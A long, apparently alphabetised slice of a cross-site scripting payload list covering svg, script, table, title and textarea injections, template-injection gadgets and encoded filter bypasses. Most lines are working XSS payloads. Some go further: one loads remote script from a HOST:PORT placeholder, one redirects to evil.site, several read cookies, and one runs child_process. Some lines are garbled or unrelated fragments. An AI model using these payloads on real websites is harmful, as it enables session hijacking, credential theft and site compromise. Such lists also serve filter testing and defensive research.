- <svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
- <svg/onload=location=name//>
- <svg/onload=location=name//
- <svg/onload=location=name//>CLICK</a>
- <svg/onload=location=name//��>CLICK</a>
- <svg+onload=location=URL.slice(7,26)>
- <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
- <svg onload=navigator.vibrate(500)>
- <svg onload=navigator.vibrate([500,300,100])>
- <svg/onload=parent[/loca/.source%2b/tion/.source]=name//
- <svg onload=popup=1;>
- <svg/onload=prompt(0);>
- “<svg/onload=prompt(0);>”
- <svg/onload=prompt(1);>
- <svg/onload=prompt(1)
- — !><svg/onload=prompt(1)
- “><svg/onload=prompt(1)>
- ><svg/onload=prompt(Xss)>
- ��><svg/onload=prompt(��Xss��)>
- “/><svg/onload=(prompt)(/XSS/)>#
- ><svg/onload=prompt(Xss-By-Muhaddi)>
- <svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
- ><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
- “<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”
- “\”><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”,
- “><svg onload=”prompt(/xss/)”></svg>
- <svg onload=setInterval(function(){d=document;
- <svg onload=setInterval(function(){with(document)body.
- <svg/onload=setInterval(function(){with(document)body.
- <svg onload=setInterval(function(){with(document)body.appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
- <svg/onload=setTimeout`alert\`1\``>
- <svg onload svg onload=”javascript:javascript:alert(1)”></svg onload>
- <svg onLoad svg onLoad=”javascript:javascript:alert(1)”></svg onLoad>
- <svg/onload=top[��loca��%2b��tion��]=name//
- <svg/onload=top[loca%2btion]=name//
- <svg/onload=top[/loca/.source%2b/tion/.source]=name//
- <svg/onload=u=URL,l=u.length,location=/javascrip/.source%2Bu[1]%2Bu[4]%2B/alert/.source%2Bu[l-2]%2b1%2Bu[l-1]>#()
- <svg/onload=u=URL,l=u.length,location=/javascrip/.source+u[1]+u[4]+/alert/.source+u[l-2]+1+u[l-1]>#()
- <svg onload=”void ‘javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’;”></svg>
- <svg onload=”void ‘javascript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d
- <svg/onload=window.onerror=alert;throw/XSS/;//
- <svg/onload=window.onerror=confirm;throw/5/;//
- <svg/onload=window.onerror=confirm;throw/XSS/;//”
- <svg/onload=window.onerror=confirm;throw/XSS/;//
- <svg onload=write(1)>
- <svg onresize=”alert(1)”>
- <svg onResize svg onResize=”javascript:javascript:alert(1)”></svg onResize>
- <svg onunload svg onunload=”javascript:javascript:alert(1)”></svg onunload>
- <svg onUnload svg onUnload=”javascript:javascript:alert(1)”></svg onUnload>
- <svg><oooooo/oooooooooo/onload=alert(1) >
- <svg o<script>nload=alert(1)>
- <svg o<script>nload=alert(6)>
- <sVG/renwa/OnLoaD+=”window[‘confirm’]+(1)”>
- <sVg><scRipt %00>alert(1) {Opera}
- <sVg><scRipt %00>confirm(1)
- <sVg><scRipt %00>prompt(/@soaj1664ashar/)????????????????
- <svg><script>0<[alert(36)]</script>
- <svg><script>123<1>alert(123)</script>
- <svg><script>alert( 1)
- <svg><script ?>alert(1)
- “><svg><script>alert`1`
- “><svg><script>/<@/>alert(1337)</script>
- <svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
- <svg><script>/<@/>alert(1)</script>//INJECTX
- <svg><script>alert(1)//!#ERROR?&^%$#</script></svg>
- <svg><script>alert( 1)
- <svg><script>alert( 1)
- <svg><script>alertƑ)
- <Svg> <script> alert & # 40 1 & # 41
- <svg><script>alert(/1/)</script>
- <Svg> <script> alert & # 40/1 / & # 41 </ script>
- <svg><script>alert`1`<p>
- <svg><script>alert`1`<p>
- <sVg><scRipt >alert(1) {Opera}
- <svg><script>alert(1)</script>
- <svg><script>a=’<svg/onload=alert(1)></svg>’;alert(2)</script>
- <svg><script>a<svg//onload=confirm(2) />lert(1)</script>
- <svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
- <svg><script ?>confirm(1);
- <svg><script ?>confirm(1)
- <svg><script>confirm(/1/)</script>
- <svg><script>confirm`1`<p><svg><script>confirm`1`<p>
- <svg><script>confirm(“");confirm(‘yes’)//no”)</script>
- <svg><script>location=<>javascript&#x3A;alert(1)<!/></script>
- <svg><script>location=<>javascript&#x3A;confirm(1)<!/></script>
- <svg><script>/**/alert(‘ @0x6D6172696F ‘)//*/</script></svg>?
- <svg><script>/**/confirm(3)//*/</script></svg>
- <svg><script>//
confirm(1);</script </svg>
- <svg><script>//
confirm(1);</script </svg>
- “/><svg><script>//
confirm(1);</script </svg>
- <svg><script onlypossibleinopera:-)> alert(1)
- <svg><script onlypossibleinopera:-)> alert(1)
- <svg><script onlypossibleinopera:-)> confirm(1)
- <svg><script>prompt( 1)<i>
- <svg><script>prompt(1)<b>
- <svg><script>prompt(1)</script>
- <svg><script>varmyvar=”text”;alert(1)//”;</script></svg>
- <svg><script>varmyvar=”text";alert(1)//”;</script></svg>
- <Svg> <script> varmyvar = “text & quot ;; alert (1) //”; </ script> </ svg>
- <svg><script>varmyvar=vYourInputv;</script></svg>
- <svg><script>varmyvar=YourInput;</script></svg>
- <Svg> <script> varmyvar = “YourInput”; </ script> </ svg>
- <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js'
- <svg><script x:href=’https://dl.dropbox.com/u/13018058/js.js' {Opera}
- <svg><script/XL:href= data:;;;base64;;;;,<>��YWx��lc��nQ��oMSk��=> mix!
- <svg><script xlink:href=”data:,alert(1)”>
- <svg><script xlink:href=data:,alert(1) /> *
- <svg><script xlink:href=data:,alert(1) />
- <svg><script xlink:href=data:,alert(1) />
- “><svg><script/xlink:href=”data:,alert(1)
- <svg><script xlink:href=data:,alert(174) />
- <svg><script xlink:href=data:,alert(1)></script>
- <svg><script/xlink:href=data:,alert(1)></script>
- <svg><script xlink:href=data:,window.open(‘https://www.google.com/')></script
- <svg><script xlink:href=data:,window.open(‘https://www.google.com/') </script
- <svg><set href=#k attributename=href to=data:,alert(59)><script id=k></script>
- <svg><style>{font-family:’<iframe/onload=confirm(1)>’
- <svg><style>*{font-family:’<svg onload=alert(1)>’;}</style></svg>
- <svg><style>*{font-family:’<svg onload=confirm(1)>’;}</style></svg>
- <svg><style><img/src=x onerror=alert(1)// </b>
- <svg><style><img src=x onerror=confirm(1)></svg>
- “><svg><style>{-o-link-source:’<body/onload=confirm(1)>’
- </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>alert(1) {Opera}
- </svg>’’<svg><script ‘AQuickBrownFoxJumpsOverTheLazyDog’>confirm(1)
- <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
- <svg[U+000B]onload=alert(1)>
- <svg><use xlink:href=”data:image/svg+xml;ba 
se	64;,PHN2ZyBpZD 0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53M y5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3a WR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8 YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0K GxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lk dGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC 9zdmc+#rectangle” /></svg>
- <svg><use xlink:href=data:image/svg+xml;base64,PHN2ZyBpZD0iYnJ1dGUiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiPg0KPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoZG9jdW1lbnQuZG9tYWluKSIvPjwvc3ZnPg==#klutz>
- <svg><use xlink:href=’data:image/svg+xml,<svg id=”klutz” xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink"><embed xmlns=”http://www.w3.org/1999/xhtml" src=”javascript:alert(document.domain)”/></svg>#klutz’>
- <svg><!V-alert(1)-
- <svg><!V’-alert(1)-’
- <svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javascript:alert(1)>
- <svg xml:base=”data:text/html,<script>confirm(1)</script>”><a xlink:href=”#”><circle r=”40"></circle></a></svg>
- <svg xmlns=”http://www.w3.org/2000/svg">
- <svg xmlns=��http://www.w3.org/2000/svg��>
- <svg xmlns=”http://www.w3.org/2000/svg"> <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(9)”><rect width=”1000" height=”1000" fill=”white”/></a> </svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(1)”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:alert(9)”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:confirm(1)”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> //
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg>
- <Svg xmlns = “http://www.w3.org/2000/svg"> <g onload = “javascript: \ u0061lert (1);”> </ g> </ svg>
- <svg xmlns=”http://www.w3.org/2000/svg"><g onload=”javascript:\u0061lert(1);”></g></svg> // By Secalert
- <svg xmlns=”http://www.w3.org/2000/svg" id=”foo”>
- <svg xmlns=”http://www.w3.org/2000/svg" id=”x”>
- <svg xmlns=”http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
- <svg xmlns=”http://www.w3.org/2000/svg" onload=”alert(document.domain)”/>
- <svg xmlns=”http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
- <svg xmlns=”http://www.w3.org/2000/svg" xmlns:xlink=”http://www.w3.org/1999/xlink">
- <svg xmlns=”#”><script>alert(1)</script></svg>
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href”
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <Svg xmlns: xlink = “http://www.w3.org/1999/xlink"> <a> <circle r = 100 /> <animate attributeName = “xlink: href” values ??= “; javascript: alert (1 ) “begin =” 0s “dur =” 0.1s “fill =” freeze “/>
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/> // By Mario
- <svg xmlns:xlink=”http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName=”xlink:href” values=”;javascript:confirm(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=” javascript:alert(10)” /><a id=x><rect width=100 height=100 /></a>
- <svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName=”xlink:href” values=” javascript:alert(1)” /><a id=x><rect width=100 height=100 /></a>
- <svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <svg xmlns:xlink=” r=100 /><animate attributeName=”xlink:href” values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
- <svG x=”>” onload=(co\u006efirm)``>
- <svg><x><script>alert(177)</x>
- <svg><x><script>alert(1)</x>
- <svg/x=”> <script>alert(37)</script> <”onload=alert(370)>
- <svg><x><script>alert('1')</x>
- <svg></ y=”><x” onload=alert(‘@0x6D6172696F’)>
- <svg></y=”><x” onload=alert(1)>
- <svg></ y=”><x” onload=confirm(4)>
- swfupload.swf?buttonText=test<a href=”javascript:confirm(1)”><img src=”https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
- swfupload.swf?movieName=”]);}catch(e){}if(!self.a)self.a=!alert(1);//
- <[S]x onx[S]xx=1
- ‘/(\t)/’,
- <table background=”javascript:alert(1)”></table>
- <table background=javascript:alert(1)></table>
- <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6
- <TABLE BACKGROUND=”javascript:alert(‘XSqS’)”>
- <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE BACKGROUND=”javascript:alert(XSS)”>
- <table background=javascript:alert(/xss/)></table>/
- <;TABLE BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TABLE>;
- <TABLE BACKGROUND=”javascript:alert(‘XSS’)”></TABLE>
- <TABLE BACKGROUND=”javascript:confirm(document.location)”>
- <table BACKGROUND=”javascript:document.vulnerable=true;”>
- <table background=”javascript:javascript:alert(1)”>
- <TABLE BACKGROUND=”javascript:javascript:alert(1)”>
- <TABLE id=XSS BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE id=XSS><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>”
- <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- <TABLE><TD BACKGROUND=”javascript:alert(XSS)”>
- <;TABLE>;<;TD BACKGROUND=”;javascript:alert(‘;XSS’;)”;>;<;/TD>;<;/TABLE>;
- <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”></TD></TABLE>
- <table><TD BACKGROUND=”javascript:document.vulnerable=true;”>
- <TABLE><TD BACKGROUND=”javascript:javascript:alert(1)”>
- <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bconfirm(1)%09><td>AAAAAAAAA
- <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt(1)%09><td>AAAAAAAAA
- <TAG EVENT=alert(1)>
- <tag handler=code>
- {tag}<img name=”{/tag} <img src=xx:x onerror=alert({{i}})//”>
- <TAG RESOURCE=javascript:alert(1)>
- tags =querySelectorAll(“.class1”);
- tags =querySelectorAll(“[data-foo]”);
- tags =querySelectorAll(“[data-foo^=bar]”);
- tags =querySelectorAll(“myTag”);
- tags = querySelectorAll(“#someId”);
- </tag><svg onload=alert(1)>
- “></tag><svg onload=alert(1)>
- ?TargetAS=javascript:alert(1)”,
- target=x><input type=hidden name=comment>click me!</form>
- ?t=confirm(1)&k7=”><svg/t=’&k8=’onload=’/&k9=/+eval(t)’
- <TD BACKGROUND=”javascript:alert(‘XSS’)”>
- <td width=”628" background=”/img/index2_r7_c2_r1_c5_s1_s1.jpg”>
- ‘te’ ? alert(‘ifelsesh’) : ‘xt’;
- ‘te’ ^ alert(‘^’) ^ ‘xt’;
- ‘te’ < alert(‘<’) < ‘xt’;
- ‘te’ == alert(‘==’) == ‘xt’;
- ‘te’ > alert(‘>’) > ‘xt’;
- ‘te’ | alert(‘|’) | ‘xt’;
- ‘te’ — alert(‘-’) — ‘xt’;
- ‘te’ , alert(‘,’) , ‘xt’;
- ‘te’ ; alert(‘;’) ; ‘xt’;
- ‘te’ ? alert(‘?:’) : ‘xt’;
- ‘te’ / alert(‘/’) / ‘xt’;
- ‘te’ * alert(‘*’) * ‘xt’;
- ‘te’ & alert(‘&’) & ‘xt’;
- ‘te’ % alert(‘%’) % ‘xt’;
- ‘te’ + alert(‘+’) + ‘xt’;
- ‘te’ in alert(‘in’) in ‘xt’;
- ‘te’ instanceof alert(‘instanceof’) instanceof ‘xt’;
- template is=dom-bind div
- ><test onclick=alert(/Xss-By-Muhaddi/)>Click Me</test>
- ><test onclick=alert(/Xss/)>Click Me</test>
- ��><test onclick=alert(/Xss/)>Click Me</test>
- test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script¬bot=UzXGjMCo8AoAAFUcKTEAAAAN
- ‘text’ ( alert(‘()’) );
- ‘text’ [ alert(‘[]’) ];
- text;alert(1)//
- <textarea autofocus onfocus=alert(1)>
- <textarea autofocus onfocus=alert(1)>//INJECTX
- <textarea autofocus onfocus=confirm(3)>
- “><textarea autofocus onfocus=co\u006efir\u006d(1)>
- “><textarea autofocus onfocus=prompt(1)>
- <!</textarea <body onload=’alert(1)’>
- </textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
- <textarea id=ta onfocus=%22write(‘<script>alert(1)</script>’)%22 autofocus></textarea>
- <textarea id=ta onfocus=%22write(‘<script>confirm(1)</script>’)%22 autofocus></textarea>
- <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
- <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open(‘GET’%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)’%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
- <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- “/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = ‘(.*?)’/)[1])</script>
- <textarea id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <textarea>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
- <textarea name=’file”; filename=”test.<img src=a onerror=document&#46;location&#61;&#34;http:&#47;&#47;evil&#46;site&#34;>’>
- <textarea name=p id=p>”
- <textarea name=p id=p>
- “<textarea onmousemove=’confirm(1);’>”
- </textarea>’”><script>alert(document.cookie)</script>
- </textarea>’”><script>alert(document.cookie)</script>
- </textarea><script>alert(/xss/)</script>
- </textarea>’”><script>alert(XSS)</script>
- </textarea><ScRiPt>prompt(/man shum/)</ScRiPt//
- ‘//” →</textarea></style></script></title><b onclick= alert()//>*/alert()/*
- <textarea></textarea>test<! — </textarea><img src=xx: onerror=confirm(1)> →
- textContent, nextSibling.nodeValue, firstChild.nodeValue, lastChild.nodeValue, innerHTML
- this+1;
- this[[]+(‘eva’)+(/x/,new Array)+’l’](/xxx.xxx.xxx.xxx.xx/+name,new Array)
- this[Object[“keys”](this)[146]](1)
- this[Object[“keys”](this)[5]](1)
- this[“ownerDocu”+”ment”][“loca”+”tion”]=��//google.com��
- three=”{{set(‘me’,nextSibling.previousSibling)}}”
- throw delete~typeof~confirm(1)/
- \));throw_error()}catch(e){alert(document.domain))}//
- <TimeDisplayFont>Arial</TimeDisplayFont>
- <TimeDisplayFontColor>000000</TimeDisplayFontColor>
- <TimeDisplayFormat>MM:SS</TimeDisplayFormat>
- </title””>
- <””/title>
- <title>*/;alert(2);function%20text(){};function%20html(){}
- </title><frameset><frame src=”data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>”>
- </title><frameset><frame src=”data:text/html,<script>confirm(1)</script>”>
- </title id=””>
- <title><img src=”</title><img src=x onerror=alert(1)//”> // by evilcos
- <title>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title>
- <title onpropertychange=alert(1)></title><title title=>
- <title onpropertychange=alert(1)></title><title title=></title>
- <title onpropertychange=javascript:alert(1)></title><title title=>
- <title onPropertyChange title onPropertyChange=”javascript:javascript:alert(1)”></title onPropertyChange>
- ‘“></title><script>alert(1111)</script>
- ‘“></title><script>alert(1111)</script>
- ‘“></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
- </title></script>”-alert(187)-”><svg onload=’;alert(1870);’>
- </title><script>alert(1)</script>
- </title></script>”-alert(46)-”><svg onload=’;alert(460);’>
- </TITLE><SCRIPT>alert(“XSS”)
- ‘“></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
- “>></title><script>alert(“XSS by \nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
- </title><script>alert(/xss/)</script>
- <;/TITLE>;<;SCRIPT>;alert(“XSS”);<;/SCRIPT>;
- </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- </title><SCRIPT>document.vulnerable=true;</script>
- </title>”/</script></style></textarea/ →*/<alert()/*’ onclick=alert()//>/
- /</title/’/</style/</script/ →<p” onclick=alert()//>*/alert()/*
- /</title/’/</style/</script/</textarea/ →<p” onclick=alert()//>*/alert()/*
- </title></style></textarea> →</script><a”//’ onclick=alert()//>*/alert()/*
- </title></textarea></style></script →<li ‘//” ‘*/alert()/*’, onclick=alert()//
- toJSON=alert;JSON.stringify(window);
- top[630038579..toString(30)](1)
- top[8680439..toString(30)](1)
- top[8680439..toString(30)](7);
- top[8680439..toString(30)](90)
- top[‘al\145rt’](1)
- top[‘al\145rt’](88)
- top[“al”+”ert”](1)
- top[“al”+”ert”](5);
- top[“al”+”ert”](85)
- top[/al/.source+/ert/.source](1)
- top[/al/.source+/ert/.source](8);
- top[/al/.source+/ert/.source](86)
- top[‘al\x65rt’](1)
- top[‘al\x65rt’](89)
- top[‘al\x65rt’](9);
- top[atob(‘cHJvbXB0’)]()
- top[‘con’.concat(‘firm’)](1)
- top.require(‘child_process’).execSync(‘open -a Calculator’)
- top[unescape(‘%61%6c%65%72%74’)]()
- “”+{toString:alert}
- {…{toString:()=>alert()}}
- toString=alert; this+’1';
- {{{}.toString.constructor(‘confirm(1)’)()}}
- {{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat;
- {{ (toString()).constructor.prototype.charAt=(toString()).constructor.prototype.concat; $eval((toString()).constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)) }}
- {{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}}
- {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor);}}
- {{toString.constructor.prototype.toString=toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor)}}
- {{{}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)//’); }}
- {{ {}[{toString:[].join,length:1,0:’__proto__’}].assign=[].join; ‘a’.constructor.prototype.charAt=’’.valueOf; $eval(‘x=alert(1)//’); }}
- toUpperCase XSS document.write(‘<? oncl?ck=alert(1)>asd</?>
- try{?????????????????????????????=0;?????????????????????????????()}catch(e){alert(e)}
- try{‘a’ (alert(1)) in ‘a’}catch(e){ ‘a’ (alert(2)) instanceof ‘a’}
- try{confirm(document.domain)}catch(e){location.reload()}
- (()=>{try{return alert(1),eval(‘throw 1’);}catch(e){return alert(2)}finally{return alert(3)}})()
- try{!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
- <t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>”>
- <t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>alert(“XSS”)</SCRIPT>”>
- two={{set(‘_nodes.0.scriptprop.src’,’data:\,’)}}
- typeof delete typeof delete void void new new alert`1`
- %u0022%u003e
- %u0022%u003e%u003cscript%u003ealert(1);%u003c/script%u003e
- %u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
- %u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e
- %u0022%u003e%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
- %u0022%u003e%u003cscript%u003ealert(XSS);%u003c/script%u003e
- %u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065
- \u0027-confirm`1`-\u0027
- \u003c
- \u003C
- \u003cimg src=1 onerror=alert(/xss/)\u003e
- u003cimg src=1 onerror=alert(/xss/)u003e
- \u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e
- %u003cscript%u003ealert(1);%u003c/script%u003e
- %u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
- %u003cscript%u003ealert%u00281uff09%u003b%u003c%uff0fscript%u003e
- %u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
- %u003cscript%u003ealert(XSS);%u003c/script%u003e
- \u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e
- \u003csvg/onload=alert`1`\u003e
- %u003csvg onload=alert(55)>
- \u003e
- \u003E
- \u0061lert(1)
- \u0061\u006c\u0065\u0072\u0074
- \u0061\u006c\u0065\u0072\u0074(1)
- \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
- [U+2028]confirm(1)
- [U+2028]prompt(1)[U+2028] →
- U+2200 = [0x00][0x00][0x22][0x00]
- %u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
- %u3008svg onload=alert(56)>
- > U+3C00 = [0x00][0x00][0x3C][0x00]
- < U+3E00 = [0x00][0x00][0x3E][0x00]
- \u{61}l\u{65}rt`1`
- \u{61}|\u{65}rt`1`
- u;alert(1)//
- %uff02%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
- %uff02%uff1e%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
- %uff1cimg%20src=x%20onerror=prompt(1)%uff1e
- %uff1cscript%uff1ealert(1234)%uff1c/script%uff1e
- %uff1cscript%uff1ealert(1);%uff1c/script%uff1e
- %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
- %uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
- %uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
- %uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
- ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’”>>”
- ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’
- %uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
- %uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e
- %uff1csvg onload=alert(57)>
- \uff1c\uff53\uff43\uff52\uff49\uff50\uff54\uff1e\uff41\uff4c\uff45\uff52\uff54\uff08\uff07\uff58\uff53\uff53\uff07\uff09\uff1c\uff0f\uff53\uff43\uff52\uff49\uff50\uff54\uff1e
- %uff1c%uff53%uff43%uff52%uff49%uff50%uff54%uff1e%uff41%uff4c%uff45%uff52%uff54%uff08%uff07%uff58%uff53%uff53%uff07%uff09%uff1c%uff0f%uff53%uff43%uff52%uff49%uff50%uff54%uff1e
- %ufflcxss%2f%uffle
- <ul><li><svg onload=”confirm(1)”></li></ul>
- u/><marquee onfinish=confirm(123)>a</marquee>
- [unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)]
